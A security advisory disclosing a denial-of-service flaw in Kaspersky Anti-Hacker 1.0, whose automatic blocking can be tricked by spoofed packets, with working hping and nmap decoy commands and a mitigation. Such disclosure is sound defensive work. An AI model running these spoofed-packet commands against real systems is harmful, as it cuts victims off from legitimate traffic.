Easy DoS on Kaspersky Anti-Hacker v1.0

[Bojan Zdrnja <Bojan.Zdrnja () LSS hr>]

Product: Kaspersky Anti-Hacker
Version: 1.0
Website: http://www.kaspersky.com/buyonline.html?info=967571

1. Introduction
---------------

Kaspersky Anti-Hacker is a Kaspersky Lab personal firewall product. As other
products in this category, Kaspersky Anti-Hacker allows creation of packet
and application filtering rules.

Among the other things, Kaspersky Anti-Hacker has included a very simple version
of Intrusion Detection System. This IDS module is automatically activated upon
installation of product. IDS is capable of detecting only 7 attacks, including
port scanning and SYN/UDP flooding. Together with the IDS, firewall has also a
possibility of active blocking of detected attacks. This option (which is turned
on by default) makes DoS attacks on remote users running Kaspersky Anti-Hacker
very easy.


2. Exploit
----------

If active blocking is turned on, upon detection of known attack, Kaspersky
Anti-Hacker will block *ALL* traffic to source IP address detected in attack.
By sending spoofed packets a remote machine running Kaspersky Anti-Hacker
attacker can easily deny legitimate traffic to any IP address.

Example with hping2:

# hping -S -i u1 -s +1025 -p +21 <victims_IP_address> -w 3072 -a \
<spoofed_IP_address>

Kaspersky Anti-Hacker will report this attack as SYN flood and will
automatically block all traffic to spoofed_IP_address.

Same thing can be accomplished with nmap's decoy option:

# nmap -sS -P0 -D<spoofed_IP_address> <victims_IP_address>

This time Kaspersky Anti-Hacker will detect port scanning attack and
automatically block all traffic to spoofed_IP_address.


3. Solution
-----------

Disable Assaulter blocking time option. Kaspersky Anti-Hacker will still report
possible attacks and user can stop them manually.


4. Vendor
---------

Vendor notified, no response received.


Best regards,

Bojan Zdrnja